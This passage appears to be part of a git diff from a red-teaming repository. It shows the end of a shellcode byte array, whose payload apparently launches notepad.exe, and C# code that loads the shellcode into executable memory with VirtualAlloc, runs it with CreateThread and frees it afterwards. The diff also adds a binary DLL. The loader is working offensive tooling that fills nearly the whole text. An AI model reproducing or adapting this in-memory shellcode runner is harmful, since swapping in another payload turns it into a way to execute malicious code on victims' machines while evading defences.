0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47,
|
||||||
|
0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x6e, 0x6f, 0x74, 0x65, 0x70,
|
||||||
|
0x61, 0x64, 0x2e, 0x65, 0x78, 0x65, 0x00
|
||||||
|
};
|
||||||
|
|
||||||
|
IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||||
|
Marshal.Copy(payload, 0, funcAddr, payload.Length);
|
||||||
|
IntPtr hThread = IntPtr.Zero;
|
||||||
|
UInt32 threadId = 0;
|
||||||
|
|
||||||
|
hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId);
|
||||||
|
WaitForSingleObject(hThread, 0xFFFFFFFF);
|
||||||
|
|
||||||
|
CloseHandle(hThread);
|
||||||
|
VirtualFree(funcAddr, 0, MEM_RELEASE);
|
||||||
|
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
BIN
red-teaming/rogue-dot-net/rogue.dll
Normal file
BIN
red-teaming/rogue-dot-net/rogue.dll
Normal file
Binary file not shown.
Loading…
Reference in New Issue
Block a user